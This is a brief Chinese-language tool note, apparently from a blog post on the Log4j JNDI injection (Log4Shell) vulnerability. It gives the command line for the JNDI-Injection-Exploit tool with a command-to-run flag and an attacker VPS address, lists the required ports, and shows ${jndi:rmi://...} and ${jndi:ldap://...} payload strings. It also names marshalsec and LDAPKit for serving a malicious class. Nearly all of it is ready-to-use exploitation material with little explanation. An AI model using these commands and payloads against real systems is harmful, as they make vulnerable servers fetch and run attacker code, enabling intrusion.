工具推荐

JNDI-Injection-Exploit

  1. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe" -A 127.0.0.1
  2. #-C 指定要执行的命令
  3. #-A vpsip
  4. #!# 1099,8180,1389三个端口不可占用

执行完毕就是常用的利用链

  1. ${jndi:rmi://127.0.0.1:1099/pfpvmj}

image-20211212085239278.png

marshalsec

这个需要配合web服务去下载恶意lei

或者使用改进版LDAPKit
image-20211212090013542.png

  1. ${jndi:ldap://127.0.0.1:1389/badClassName}